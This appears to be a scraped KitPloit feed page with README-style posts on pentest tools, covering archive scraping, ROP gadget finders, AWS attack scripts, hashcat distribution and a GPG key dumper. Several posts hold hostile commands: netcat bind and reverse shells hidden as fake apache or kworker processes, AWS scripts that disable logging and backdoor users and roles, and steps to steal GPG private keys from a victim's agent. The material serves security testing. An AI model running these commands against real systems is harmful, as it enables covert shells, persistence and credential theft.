Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5854 articles
Browse latest View live

ReconCat - Tool To Fetch Archive Url Snapshots From Archive.org

April 13, 2018, 1:23 pm
$
0
0

A small Php application to fetch archive url snapshots from archive.org.
using it you can fetch complete list of snapshot urls of any year or complete list of all years possible.
Made Specially for penetration testing purpose.
This application is powered by WMB-Scrapper

Installation
Clone this repository,
    git clone https://github.com/daudmalik06/ReconCat
    cd ReconCat
    php recon

Requirements
  • This application requires php 7+
  • multi threading is available as optional, if you have php pthreads installed you can use that to speed up the process.

Information
  • it saves all snapshots in Output directory, e,g for google.com it will make a directory as Output/google.com and will save all related snapshot in that directory
  • all snapshot will be saved on year bases, i.e snapshot of every year will be saved in different file e.g 2009_google.com .
  • threads are used for fetching several(year based) snapshot concurrently
  • single year snapshot is fetched in a single thread

Usage
For help
php recon --help


Other commands
php recon --url=https://github.com -t10  (fetch all snapshot of github with 10 threads)
php recon -y2012 --url=https://github.com -t10  (fetch snapshot of year 2012 of github with 10 threads)

Author
Dawood Ikhlaq and Open source community


Search

Mimic - A Tool For Covert Execution In Linux

April 14, 2018, 6:10 am
$
0
0

mimic is a tool for covert execution on Linux x86_64.

What is "covert execution"?
Covert execution is the art of hiding a process. In this case, mimic hides the process in plain sight. mimic can launch any program and make it look like any other program. Any user can use it. It does not require special permissions. It does not require special binaries. It does not require a root kit.

What?! No special privileges??
That is correct. mimic works by rearranging the internal structures of a process in such a way that it confuses the /proc entry for that process. All tools that report the nature of a process do so by examining /proc. If we can bend /proc, then we can hide a process in plain sight. Since we are only altering the state of a process we own, anyone can successfully run mimic.

Can this be detected?!
Of course, but only if you are looking very closely, or running a forensic tool that is looking for this sort of thing. The usefulness behind mimic is that it will prevent someone from becoming suspicious in the first place.

Will this work with scripts?
Yes, but you need to call mimic directly on the interpreter. For example, if the first line of your script is "#!/usr/bin/perl" then you'll want to call mimic like this:
empty@monkey:~$ mimic -e "/usr/bin/perl test.pl"
By invoking the interpreter directly, mimic can work it's magic.

Who is the target audience for mimic?
Anyone who legitimately needs covert execution before they have gotten root. This includes, but is not limited to:
  • Pentesters.
  • Investigators performing covert operations (with the prior approval of their Legal and HR departments, of course.)

Why is it called "mimic"?
Because "Liar, liar, /proc on fire!" was too long.

What is "set_target_pid"?
set_target_pid is a small helper program in the mimic suite that will exhaust pids until the one you want comes back around. This allows you to choose where in the process listing you want your process to sit. Note that the kernel reserves the first 300 pids for kernel threads. If you try to go below that, you'll probably end up running with pid 301.

Installation
git clone https://github.com/emptymonkey/ptrace_do.git
cd ptrace_do
make
cd ..

git clone https://github.com/emptymonkey/mimic.git
cd mimic
make

Usage
usage: mimic -e COMMAND [-m MIMIC] [-b] [-a KEY=VALUE] [-q] [-h]
 -e Execute COMMAND.
 -m Setup COMMAND to look like MIMIC.
   Default for non-root is:    "/usr/sbin/apache2 -k start"
   Default for root is:        "[kworker/0:0]"
 -b Launch COMMAND in the background.
 -a Add / overwrite KEY to the mimic environment with associated VALUE.
 -q Be quiet! Do not print normal output.
 -h Print this helpful message.

 Notes:
  The MIMIC environment will be a copy of the COMMAND environment.
  The '_' variable is automatically changed.
  The -a flag can be called multiple times to add / overwrite multiple variables.

 Examples:
  mimic -e /bin/bash
  set_target_pid 1 && mimic -e /bin/bash
  mimic -b -e "./revsh"
  mimic -b -e "nc -l -e /bin/bash"
  mimic -b -e "nc -l -e \"mimic -e /bin/bash\""

Examples
First example - Launching a netcatlistener as a regular user:
empty@monkey:~$ ./mimic -b -e "/usr/local/bin/ncat -l -e \"./mimic -e /bin/bash\""
Launching child...                  Success!
Waiting for child to attach...      Success!
Initializing ptrace_do...           Success!
Determining stack state...          Success!
Politely requesting name change...  Success!
Searching for main()...             Success!
Building execution headers...       Success!
Setting up final state...           Success!

 Good-bye and have a good luck! :)

empty@monkey:~$ ps aux | grep apache
empty     1931 19.5  0.0  16648  1324 pts/1    S    21:41   0:02 /usr/sbin/apache2 -k start
empty     1935  0.0  0.0   7596   836 pts/1    S+   21:41   0:00 grep apache

empty@monkey:~$ sudo lsof -i -n -P | grep apache
[sudo] password for empty: 
apache2  1931 empty    3u  IPv6  14462      0t0  TCP *:31337 (LISTEN)
apache2  1931 empty    4u  IPv4  14463      0t0  TCP *:31337 (LISTEN)
Second example - Launching a netcat reverse shell as root:
root@monkey:~$ /home/empty/code/mimic/set_target_pid 1 && /home/empty/code/mimic/mimic -b -q -e "/usr/local/bin/ncat -e \"/home/empty/code/mimic/mimic -e \\\"/bin/bash\\\"\" localhost 9999"
Can you spot the fake kworkers? Would you be able to without the help of grep?
root@monkey:~$ ps aux | grep kworker | grep -v grep
root        18  0.0  0.0      0     0 ?        S    19:39   0:00 [kworker/3:0]
root       197  0.0  0.0      0     0 ?        S    19:39   0:06 [kworker/u:3]
root       198  0.0  0.0      0     0 ?        S    19:39   0:06 [kworker/u:4]
root       199  0.0  0.0      0     0 ?        S    19:39   0:06 [kworker/u:5]
root       302 23.4  0.0  18748  1912 pts/5    S    22:28   0:02 [kworker/0:0]
root       304 11.4  0.0   3780   296 pts/5    S    22:28   0:00 [kworker/0:0]              
root       305 10.8  0.0  10644  1200 pts/5    S    22:28   0:00 [kworker/0:0]
root       426  0.0  0.0      0     0 ?        S    20:20   0:00 [kworker/1:0]
root       434  0.0  0.0      0     0 ?        S    20:20   0:00 [kworker/3:2]
root       536  0.0  0.0      0     0 ?        S    20:12   0:00 [kworker/0:0]
root       879  0.0  0.0      0     0 ?        S    20:39   0:00 [kworker/2:0]
root      1463  0.0  0.0      0     0 ?        S    19:39   0:00 [kworker/1:2]
root      2132  0.0  0.0      0     0 ?        S    19:47   0:00 [kworker/2:2]
root      2607  0.0  0.0      0     0 ?        S    20:01   0:01 [kworker/0:1]
Of course, no kworker should have an open socket, but I'm sure you can be more creative with your naming choices than this. :)
root@monkey:~$ lsof -i -n -P | grep kworker
kworker/0  302  root    4u  IPv4  20546      0t0  TCP 127.0.0.1:47054->127.0.0.1:9999 (ESTABLISHED)
kworker/0  304  root    4u  IPv4  20546      0t0  TCP 127.0.0.1:47054->127.0.0.1:9999 (ESTABLISHED)
kworker/0  305  root    4u  IPv4  20546      0t0  TCP 127.0.0.1:47054->127.0.0.1:9999 (ESTABLISHED)
Note that I'm running here as root only because a kworker thread should be very suspicious running as a non-root user. The new mimic name is just a string. It doesn't have to be an existing process. Hell, it doesn't even have to be a real thing!
empty@monkey:~$ code/mimic/mimic -q -e /bin/bash -m "Totally not a rootkit\!"

empty@monkey:~$ ps aux | grep rootkit | grep -v grep
empty      399  2.9  0.0   3780   300 pts/4    S    22:34   0:00 Totally not a rootkit!          
empty      400  2.7  0.0  19372  2044 pts/4    S    22:34   0:00 Totally not a rootkit!


Rp++ - Tool That Aims To Find ROP Sequences In PE/Elf/Mach-O X86/X64 Binaries

April 14, 2018, 2:42 pm
$
0
0

rp++ is a full-cpp written tool that aims to find ROP sequences in PE/Elf/Mach-O (doesn't support the FAT binaries) x86/x64 binaries. It is open-source, documented with Doxygen (well, I'm trying to..) and has been tested on several OS: Debian / Windows 7 / FreeBSD / Mac OSX Lion (10.7.3). Moreover, it is x64 compatible. I almost forgot, it handles both Intel and AT&T syntax (beloved BeaEngine). By the way, the tool is a standalone executable.

You can build very easily rp++ with CMake, it will generate a project file for your prefered IDE. There are some other things you will be able to do with rp++, like finding hexadecimal values, or strings, etc.

Benchmark: Is it efficient ?
Yeah, here are some benchmarks on Win7 x64, Intel i7 Q720 @ 1.6GHz, 4GB RAM:
- Target: ntoskrnl.exe x64 version 6.1.7601.17790
 D:\rp-win-x64.exe --file=ntoskrnl.exe --rop=8 > n
 ~80s for a total of 267356 gadgets found.

- Target: chrome.exe x86 version 18.0.1025.168
 D:\rp-win-x64.exe --file=chrome.exe --rop=8 > n
 ~13s for a total of 75459 gadgets found.

- Target: cmd.exe x86 version v6.1.7600
 D:\rp-win-x64.exe --file=cmd.exe --rop=8 > n
 ~15s for a total of 18818 gadgets found.

- Target: bash x86 version 4.1.5.1
 D:\rp-win-x64.exe --file=bash-x86 --rop=8 > n
 ~12s for a total of 45385 gadgets found.

Screenshots
rp++ on Win7 x64 / Debian Squeeze x64 / FreeBSD x64 / Mac OSX Lion x64:



How to use it ?

USAGE:
./rp++ [-hv] [-f <binary path>] [-i <1,2,3>] [-r <positive int>] [--raw=<archi>]
 [--atsyntax] [--unique] [--search-hexa=<\x90A\x90>] [--search-int=<int in hex>]

OPTIONS:
  -f, --file=<binary path>  give binary path
  -i, --info=<1,2,3>        display information about the binary header
  -r, --rop=<positive int>  find useful gadget for your future exploits, arg is the gadget maximum size in instructions
  --raw=<archi>             find gadgets in a raw file, 'archi' must be in the following list: x86, x64
  --atsyntax                enable the at&t syntax
  --unique                  display only unique gadget
  --search-hexa=<\x90A\x90> try to find hex values
  --search-int=<int in hex> try to find a pointer on a specific integer value
  -h, --help                print this help and exit
  -v, --version             print version information and exit

Where I can download standalone binaries ?
There are an x86 and an x64 versions for Windows (compiled with VS 2010 on Win7 x64), Linux (compiled with gcc 4.4.5 on Debian x64 6.0.1), FreeBSD (compiled with gcc 4.2.1 on FreeBSD 8.2) and Mac OSX (compiled with gcc 4.2.1 on OSX 10.7.3 ; not statically linked): https://github.com/0vercl0k/rp/downloads
Here are the sha1sums:
a2e71e88a5c14c81ae184258184e5d83082f184d *rp-fbsd-x64
29c2d5462865d28042bffe9e723d25c19f0da1f7 *rp-fbsd-x86
57e23ef42954a08c9833099d87544e2166c58b94 *rp-lin-x64
efcaf2a9584a23559e3e5b109eb37cbde89f8b29 *rp-lin-x86
5c612b3eff470b613ea06ebbbb882f0aaef8e3b4 *rp-osx-x64
2e32273b657b44d6b9a56e89ec2e2c2731713d87 *rp-osx-x86
e5e6930eb469e92f79b59941330f23daf62800be *rp-win-x64.exe
f83d4d9f9e73a60a31e495e2fbd2404c560f1a27 *rp-win-x86.exe


AWS Pwn - A Collection Of AWS Penetration Testing Junk

April 15, 2018, 6:32 am
$
0
0

This is a collection of horribly written scripts for performing various tasks related to penetration testing AWS. Please don't be sad if it doesn't work for you. It might be that AWS has changed since a given tool was written or it might be that the code sux. Either way, please feel free to contribute.
Most of this junk was written by Daniel Grzelak but there's been plenty of contributions, most notably Mike Fuller.

Requirements
pip install -r requirements.txt
Make sure to also set up your aws credentials in ~/.aws/credentials.

Reconnaissance
Things to do with pre-compromise information gathering.
  • validate_iam_access_keys.py - Given a TSV file of access key + secret [+ session] combinations, checks access validity and returns identity information of the principal.
./validate_iam_access_keys.py -i /tmp/keys.txt -o /tmp/out.json
  • validate_s3_buckets.py - Given a text file with one word per line, checks whether the buckets exist and returns basic identifying information.
./validate_s3_buckets.py -i /tmp/words.txt -o /tmp/out.json
  • validate_iam_principals.py - Given a text file of principals (e.g. user/admin, role/deploy), checks whether the principals exist in a given account.
./validate_iam_principals.py -a 123456789012 -i /tmp/words.txt -o /tmp/out.json
  • validate_accounts.py - Given a text file of account ids and account aliases, checks whether the accounts exist.
./validate_accounts.py -i /tmp/accounts.txt -o /tmp/out.json

Exploitation
Things that will help you gain a foothold in an account.

Stealth
Things that might help you stay hidden after compromising an account.
  • disrupt_cloudtrail.py - Attempts to disrupt/cripple cloudtrail logging in the specified way.
./disrupt_cloudtrail.py -s

Exploration
Things to help you understand what you've pwned.
  • dump_account_data.sh - Calls a bunch of generic account-based read/list/get/describe functions and saves the data to a given location. Very noisy but great for a point in time snapshot.
./dump_account_data.sh /tmp/

Elevation
Things to help you move around an account and gather different levels of access.
  • dump_instance_attributes.py - Goes through every EC2 instance in the account and retrieves the specified instance attributes. Most commonly used to retrieve userData, which tends to contain secrets.
./dump_instance_attributes.py -u -o /tmp/
  • dump_cloudformation_stack_descriptions.py - Retrieves the stack descriptions for every existing stack and every stack deleted in the last 90 days. Parameters in stack descriptions often contain passwords and other secrets.
./dump_cloudformation_stack_descriptions.py -o /tmp/data
  • assume_roles.py - Attempts to assume all roles (ARNs) in a file or provided by the list-roles API.
./assume_roles.py -o /tmp/out.json
  • add_iam_policy - Adds the administrator and all action policy to a given user, role, or group. Requires IAM putPolicy or attachPolicy privileges.
./add_iam_policy.py -u myuser -r myrole -g mygroup
  • bouncy_bouncy_cloudy_cloud - Bounces a given ec2 instance and rewrites its userData so that you can run arbirtary code or steal temporary instance profile credentials.
./bouncy_bouncy_cloudy_cloud.py -i instance-id -e exfiltration-endpoint

Persistence
Things to help maintain your access to an acccount.
  • rabbit_lambda - An example Lambda function that responds to user delete events by creating more copies of the deleted user.
  • cli_lambda - A lambda function that acts as an aws cli proxy and doesnt require credentials.
  • backdoor_created_users_lambda - A lambda function that adds an access key to each newly created user.
  • backdoor_created_roles_lambda - A lambda function that adds a trust relationship to each newly created role.
  • backdoor_created_security_groups_lambda - A lambda function that adds a given inbound access rule to each newly created security group.
  • backdoor_all_users.py - Adds an access key to every user in the account.
  • backdoor_all_roles.py - Adds a trust relationship to each role in the account. Requires editing the file to set the role ARN.
  • backdoor_all_security_groups.py - Adds a given inbound access rule to each security group in the account. Requires editing the file to set the rule.

Exfiltration
Things to help you extract and move data around in AWSy ways.

Miscellanea
Other things that I was either to stupid or too lazy to classify.
  • reserved_words.txt - A list of words/tokens that have some special meaning in AWS or are likely to soon have some special meaning.
  • endpoints.txt - A somewhat up to date list of API endpoints exposed by AWS.
  • integrations.txt - A TSV of services that integrate with AWS via roles or access keys and their account ids, default usernames etc.
  • download_docs.sh - The command line to wget all the AWS docs because I'm stupid and waste time redoing it every time.

To do
  • Add passwords to users for persistence
  • Dump stack resources
  • Validate mfa
  • Add more calls to dump_account_data
  • Add more log disruption methods
  • Create a cloudtrail parsing script for grabbing goodies out of cloudtrail
  • Create an s3 bucket permission enumerator
  • Create tool to grab aws credentials from common places on disk
  • Create cloning tool
  • Create silly privelege escalation tool that uses passrole
  • Validate queues
  • Validate notification topics
  • Fix up persistence scripts to use arguments instead of constants inside the scripts


MalScan - A Simple PE File Heuristics Scanners

April 15, 2018, 1:43 pm
$
0
0

MalScan is a simple PE File Heuristics Scanners written in python that you can use to quickly analyze a PE file and find out whether anything suspicious exists. It is a simple tool so doesn't offers much fancy features. You are free to extend it or do whatever you want with it.

Things Supported
  • Information About file such as MD5, SHA1, Timestamp
  • PEiD Signature Check
  • Custom Yara Rules Integration
  • Section, Imports, Exports, Resources and TLS Callbacks Overview
  • Provides some custom heuristics :-)

Installing
You need to have Python 2.7 installed on your machine. The additional requirement is yara-python.
git clone https://github.com/Ice3man543/MalScan.git .
cd MalScan
python malscan.py

Usage
Simply run with the name of file you want to check.

Tinfoleak v2.4 - The Most Complete Open-Source Tool For Twitter Intelligence Analysis

April 16, 2018, 5:27 am
$
0
0

The most complete open-source tool for Twitter intelligence analysis

Introduction
tinfoleak is an open-source tool within the OSINT (Open Source Intelligence) and SOCMINT (Social Media Intelligence) disciplines, that automates the extraction of information on Twitter and facilitates subsequent analysis for the generation of intelligence. Taking a user identifier, geographic coordinates or keywords, tinfoleak analyzes the Twitter timeline to extract great volumes of data and show useful and structured information to the intelligence analyst.
tinfoleak is included in several Linux Distros: Kali, CAINE, BlackArch and Buscador. It is currently the most comprehensive open-source tool for intelligence analysis on Twitter.

tinfoleak can extract the following information:
  • Account info / User Activity / Protected Accounts
  • Source Applications / User Devices / Use Frequency
  • Hashtags / Mentions / Likes
  • Text Analysis / Words Frequency / Media / Metadata
  • User Visited Places / User Routes / User Top Locations
  • Social Networks / Digital Identities
  • Geolocated Users / Tagged Users
  • Followers / Friends
  • Lists / Collections
  • Conversations

Installation
Install Python and dependencies:
sudo apt install python-pip python-dev build-essential python2.7-dev python-pyexiv2 python-openssl
sudo pip install --upgrade pip 
sudo pip install --upgrade virtualenv 
sudo pip install --upgrade tweepy
sudo pip install --upgrade pillow
sudo pip install --upgrade exifread
sudo pip install --upgrade jinja2 
sudo pip install --upgrade oauth2

Getting started
The first time you runs tinfoleak, you need to assign the OAuth settings.
  1. Edit "tinfoleak.conf"
    Use your favorite editor ;-)
  1. Give value to these variables:
    CONSUMER_KEY
    CONSUMER_SECRET
    ACCESS_TOKEN
    ACCESS_TOKEN_SECRET
  1. Save "tinfoleak.conf"
  1. Execute "tinfoleak.py"

Hashtopolis - A Hashcat Wrapper For Distributed Hashcracking

April 16, 2018, 1:23 pm
$
0
0

Hashtopolis is a multi-platform client-server tool for distributing hashcat tasks to multiple computers. The main goals for Hashtopolis's development are portability, robustness, multi-user support, and multiple groups management. The application has two parts:
  • Agent Multiple clients (C#, Python), easily customizable to suit any need.
  • Server several PHP/CSS files operating on two endpoints: an Admin GUI and an Agent Connection Point

Aiming for high usability even on restricted networks, Hashtopolis communicates over HTTP(S) using a human-readable, hashing-specific dialect of JSON.
The server part runs on PHP using MySQL as the database back end. It is vital that your MySQL server is configured with performance in mind. Queries can be very expensive and proper configuration makes the difference between a few milliseconds of waiting and disastrous multi-second lags. The database schema heavily profits from indexing. Therefore, if you see a hint about pre-sorting your hashlist, please do so.
The web admin interface is the single point of access for all client agents. New agent deployments require a one-time password generated in the New Agent tab. This reduces the risk of leaking hashes or files to rogue or fake agents.
There are parts of the documentation and wiki which are not up-to-date. If you see anything wrong or have questions on understanding descriptions, feel free to contact us on Twitter (@s3inlc, @winxp5421) or join our Discord server (https://discord.gg/S2NTxbz)
To report a bug, please create an issue and try to describe the problem as accurately as possible. This helps us to identify the bug and see if it is reproducible.
In an effort to make the Hashtopussy project conform to a more politically neutral name it was rebranded to "Hashtopolis" in March 2018.

Features
  • Easy and comfortable to use
  • Accessible from anywhere via web interface
  • Server component highly compatible with common web hosting setups
  • Unattended agents
  • File management for word lists, rules, ...
  • Self-updating of both Hashtopolis and Hashcat
  • Cracking multiple hashlists of the same hash type as though they were a single hashlist
  • Running the same client on Windows, Linux and OS X
  • Files and hashes marked as "secret" are only distributed to agents marked as "trusted"
  • Many data import and export options
  • Rich statistics on hashes and running tasks
  • Visual representation of chunk distribution
  • Multi-user support
  • User permission levels
  • Various notification types
  • Small and/or CPU-only tasks
  • Group assignment for agents and users for fine-grained access-control
  • Compatible with crackers supporting certain flags

Setup and Usage
Please visit the wiki for more information on setup and upgrade.
Some screenshots of Hashtopolis (by winxp5421 and s3in!c): Imgur1Imgur2


GPG Reaper - Obtain/Steal/Restore GPG Private Keys From Gpg-Agent Cache/Memory

April 17, 2018, 5:35 am
$
0
0

Obtain/Steal/Restore GPG Private Keys from gpg-agent cache/memory

This POC demonstrates method for obtaining GPG private keys from gpg-agent memory under Windows.
Normally this should be possible only within 10 minutes time frame (--default-cache-ttl value).
Unfortunately housekeeping() function (which is responsible for cache cleanup) is executed only if you are using GPG (there is no timer there).
This means that in normal GPG usecase like: you sign some file then close GUI and do other task you password is still in gpg-agent memory (even if ttl expired).
Attacker, who has access to your current session, can use this for stealing private key without knowing your passphrase.

Installation
pip install PGPy
If you got:
TypeError: Error when calling the metaclass bases metaclass conflict: the metaclass of a derived class must be a (non-strict) subclass of the metaclasses of all its bases` when running python script then:
then:
pip install six==1.10.0

Test
1. Install Gpg4Win 3.0.3
2. Open command line and start agent with 2 seconds cache time:
cd c:\Program Files (x86)\GnuPG\bin
taskkill /im gpg-agent.exe /F
gpg-agent.exe --daemon --default-cache-ttl 2
3. Run Kleopatra and generate new key pair


4. Sign some example test file


5. Pinetry will popup and ask you for passphrase


6. Repeat step 4-5. Each time pinetry shows up because our 2 seconds cache expired
7. Run GPG reaper
powershell -ExecutionPolicy Bypass -File Gpg-Reaper.ps1 -OutputFile testme.txt
You will see something like:
[+] Detect GPG version 3.0.3
[*] Readed jmp bytes: F6-05-E0-F9-45-00-04-0F-85
[*] Readed housekeeping bytes: 55
[+] Find sec key
[+] Check key grip:
[*] uid           [ultimate] Adam Nowak <anowak@example.com>
[+] Found public key
[*] Allocate memory at: 2d00000
[+] Read debug log C:\Users\user\AppData\Local\Temp\gpg_D98F5932C4193BF82B9C773F13899DD586A1DE38_KqALSXPH.txt
[+] Key dumped
[*] Kill background Job
[*] Restore bytes
As you can see we dump key. This is possible because we nopped the housekeeping function.
8. Restore private key:
python gpg_reaper.py .\testme.txt
Private key is dumped to the file:
[+] Dump E057D86EE78A0EED070296C01BC8630ED9C841D0 - Adam Nowak <anowak@example.com>

Introduction
GPG-Agent is a daemon to manage private keys independently from any protocol.
GUI interface communicates with agent using Assuan Protocol.
By default agent caches your credentials.
--default-cache-ttl n option set the time a cache entry is valid to n seconds.
The default is 600 seconds. Each time a cache entry is accessed, its timer is reseted.
Under Windows sign process looks like this:


Crucial part here is housekeeping() function which is responsible for removing expired credentials from the memory.
But there is one problem here: this function is executed only in two places (inside agent_put_cache and agent_get_cache).
This means that cached credentials are NOT removed from the memory until some gpg-agent commands which uses agent_put_cache or agent_get_cache or agent_flush_cache are executed.

Usage
On victim computer:
powershell -ExecutionPolicy Bypass -File Gpg-Reaper.ps1 -OutputFile out.txt
Transfer out.txt to your machine and restore private keys:
gpg_reaper.py out.txt
Private keys will be dumped into separate files.
If GPG is installed outside default directories:
Gpg-Reaper -GpgConnectAgentPath c:\gpg\gpg-connect-agent.exe -GpgAgentPath c:\gpg\gpg-agent.exe -GpgPath c:\gpg\gpg.exe
If you don't want debug messages:
Gpg-Reaper -Verbose $false

Post exploitation on machine with GPG
Let's assume that you are doing penetration testing and you obtain shell on computer with GPG installed.
If you are lucky and user use GPG recently and cache not expire you can:
1. Sign some file:
Run c:\Program Files (x86)\GnuPG\bin\gpg-connect-agent.exe
  • Get list of keys available on specific machine
KEYINFO --list
S KEYINFO 38EA3CACAF3A914C5EC2D05F86CDBDCFE83077D2 D - - - P - - -
  • Set keygrip and message hash
SIGKEY 38EA3CACAF3A914C5EC2D05F86CDBDCFE83077D2
# SHA512 of the message
SETHASH 10 7bfa95a688924c47c7d22381f20cc926f524beacb13f84e203d4bd8cb6ba2fce81c57a5f059bf3d509926487bde925b3bcee0635e4f7baeba054e5dba696b2bf
PKSIGN
2. Export private key:
Run c:\Program Files (x86)\GnuPG\bin\gpg-connect-agent.exe
  • Get wrapping key
KEYWRAP_KEY --export
  • Export a secret key from the key store. The key will be encrypted using the current session's key wrapping key using the AESWRAP-128 algorithm
EXPORT_KEY 38EA3CACAF3A914C5EC2D05F86CDBDCFE83077D2
Unfortunately this is not working as expected and ask for password.
Why? Because cmd_export_key() function is executing agent_key_from_file() with CACHE_MODE_IGNORE flag which means that cache won't be used and user is asked for passphrase each time.

Bypass private key export restriction
We know that it's not possible to export GPG key through gpg-agent without knowing password.
But there is little quirk here. Agent has few options available:
1. --debug-level
Select the debug level for investigating problems. level may be a numeric value or a keyword:
guru - All of the debug messages you can get.
2. --log-file file
Append all logging output to file. This is very helpful in seeing what the agent actually does.
Let's run agent using gpg-agent.exe --daemon --debug-level guru --log-file out.txt and sign some file.
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- SIGKEY 590A068768B6A5CB4DD81CD4828C72AD8427DFE4
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c -> OK
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- SETKEYDESC Please+enter+the+passphrase+to+unlock+the+OpenPGP+secret+key:%0A%22adam+nowak+<nowak@adam.xxx>%22%0A2048-bit+RSA+key,+ID+1308197BFDF95EAA,%0Acreated+2018-02-28.%0A
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c -> OK
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- SETHASH 8 B00357D0B85243BB34049E13FD5C328228BC53B317DF970594A1CED6CB89F4EA
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c -> OK
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- PKSIGN
2018-03-04 18:21:15 gpg-agent[7180] DBG: agent_get_cache '590A068768B6A5CB4DD81CD4828C72AD8427DFE4' (mode 2) ...
2018-03-04 18:21:15 gpg-agent[7180] DBG: ... miss
2018-03-04 18:21:15 gpg-agent[7180] starting a new PIN Entry
2018-03-04 18:21:15 gpg-agent[7180] DBG: connection to PIN entry established
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c -> INQUIRE PINENTRY_LAUNCHED 3736 qt 1.1.0 /dev/tty - -
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- END
2018-03-04 18:21:18 gpg-agent[7180] DBG: agent_put_cache '590A068768B6A5CB4DD81CD4828C72AD8427DFE4' (mode 2) requested ttl=0
2018-03-04 18:21:18 gpg-agent[7180] DBG: skey: (private-key
2018-03-04 18:21:18 gpg-agent[7180] DBG:        (rsa
2018-03-04 18:21:18 gpg-agent[7180] DBG:         (n #00EBF36EC96D941D126938C8BD7471F4BA4FF456A3034AD4EEBABABA3A6DE52445A2A67A4FB3DF8B90C6FD65D4B648D62749905DA1CEA7ECB8C31F7DC7ECF3B581668BA3041E6AD57DBE04D75E4C74612B310704B107AB49EE731FB991A7EE0B42E9BD4CD2FF09A2C5EC0AB13B4F53287706432BD03EFD5EA5AAC194CEF188018AAD3E394F14C587BB9A829E21EC39132652CED22B561EDB34E0E4FA64FD2E6035E035EA2592C2C89E71AD2B7A3B4BBFC14288D5448D6F7A64B37AB5AA80E5D34D03F9FC6375882D298DDBCB95F192C669DB141AA2B5F29F2DFC3B12DCB7385492C3EAD8F675901B78C69238A60E76163ED1130D9B4054A9A90AB8DA148280351F#)
2018-03-04 18:21:18 gpg-agent[7180] DBG:         (e #010001#)
2018-03-04 18:21:18 gpg-agent[7180] DBG:         (d #4B873C9EF0DB392524167FB7999742CA02FF095E9C16AFAB8D8D69407BDE1E2AC64279239B46032480762BCB17E09FE0AA9D3243B1E5B21280AF4B719C6974DFEBA5E63452D24AEDB9CE4DEC8B17B3E502082799CD8528A0D22C45181983CB0A0BCD4352C53DDDE3724807EC9EDB5538288286FB5DB6783E1AB765BD8AB6491B7021D17AEDD7494F902121C4B2C3BDB1447C0AABADD00FBD66EEC23882F9FC13DC967E6F1F5ABBAD9FA7E583360A31D3DAEC53CB46F981398CAAD511179E11B5BA04BDB79699AA58687287E9ABA9A820B22872C54078411A142AEA804497581AAD96FCBE4F01202AA4E687672973D26E7148AB7A269B60C68581817B1EB31DE5#)
2018-03-04 18:21:18 gpg-agent[7180] DBG:         (p #00ED6EA59EE03412314BF288629568237A649FACC88C5D6E2F266A58D1CF6BA26254526F916FF7CFC6AF5B5ED0618CE00099DCFB9CB1F7C6BAD6945A8125ECD6A352E8056644A7336FFE2C203B098ED7767FD51101FD4842F1DED870DFD4D1F947D5FB7AB13E318C977AB875F86785F8B98260BB3BA1F6133D03C9296F22875E23#)
2018-03-04 18:21:18 gpg-agent[7180] DBG:         (q #00FE67215C9C6FEF8C21C81A9B34AAB91FCD321D95E3641D7EFE4B89BBAD918CF94068AC89440147ED07E68EC65997568921DE740A504D2D99DDB997BE7DE09228678F544226F2D75F62447AECD7385773D9A7B0EF272B5CF4F32B4EFCB1B0B81893DE768B692D350CFB6B32A683DF773D66169A436DC233AD412FD438E366B6D5#)
2018-03-04 18:21:18 gpg-agent[7180] DBG:         (u #17BA591E668D2D78B1C74E5820A9FE31481232D34B6EBBC2004767512AD4835A42B0621EBE6CD4359BFD9B8DDA3DF234471C99B1CF553EBCF5019452143360FEC051024E43063913DD7A36FA1CA12C02FEAF07C4A4DA50C5286264BC38333C85371B13C704B1FA0265FA4DF17CC1E02B9E37ACA7D72AE40413CA6E5548107299#)))
2018-03-04 18:21:18 gpg-agent[7180] DBG: hash: (data
2018-03-04 18:21:18 gpg-agent[7180] DBG:        (flags pkcs1)
2018-03-04 18:21:18 gpg-agent[7180] DBG:        (hash sha256 #B00357D0B85243BB34049E13FD5C328228BC53B317DF970594A1CED6CB89F4EA#))
It looks like guru mode prints n, e, d, p, q and u numbers to log file. Knowing this we can calculate public and private key.
Internally skey value is print by gcry_log_debugsxp() when DBG_CRYPTO is set:
if (DBG_CRYPTO)
{
  gcry_log_debugsxp ("skey", s_skey);
  gcry_log_debugsxp ("hash", s_hash);
}

FAQ
  1. Why PowerShell?
Because this file can be run without any external dependencies on most modern Windows systems.
  1. GPG %file% not exist
gpg-connect-agent.exe, gpg-agent.exe or gpg.exe does not exist in default location.
You can try to specify custom location using:
Gpg-Reaper -GpgConnectAgentPath c:\gpg\gpg-connect-agent.exe -GpgAgentPath c:\gpg\gpg-agent.exe -GpgPath c:\gpg\gpg.exe
  1. No gpg-agent running
gpg-agent.exe is not running on this system so we cannot restore private key.
  1. Unknown gpg-agent version, sha256:
Currently this script support only specific versions
  1. No cached key
There is no cached key in memory so we cannot restore private key.

Attribution
Scythe icon made by Freepik from www.flaticon.com.
Solstice Of Suffering font by GraveTech.


Search

ROPgadget - This Tool Lets You Search Your Gadgets On Your Binaries To Facilitate Your ROP Exploitation

April 17, 2018, 1:49 pm
$
0
0

This tool lets you search your gadgets on your binaries to facilitate your ROP exploitation. ROPgadget supports ELF/PE/Mach-O format on x86, x64, ARM, ARM64, PowerPC, SPARC and MIPS architectures. Since the version 5, ROPgadget has a new core which is written in Python using Capstonedisassembly framework for the gadgets search engine - The older version can be found in the Archives directory but it will not be maintained.

Install
If you want to use ROPgadget, you have to install Capstone first.
For the Capstone's installation on nix machine:
$ sudo pip install capstone
Capstone supports multi-platforms (windows, ios, android, cygwin...). For the cross-compilation, please refer to the https://github.com/aquynh/capstone/blob/master/COMPILE.TXT file.
After Capstone is installed, ROPgadget can be used as a standalone tool:
$ ROPgadget.py
Or installed into the Python site-packages library, and executed from $PATH.
$ python setup.py install
$ ROPgadget
Or installed from PyPi
$ pip install ropgadget
$ ROPgadget

Usage
usage: ROPgadget.py [-h] [-v] [-c] [--binary <binary>] [--opcode <opcodes>]
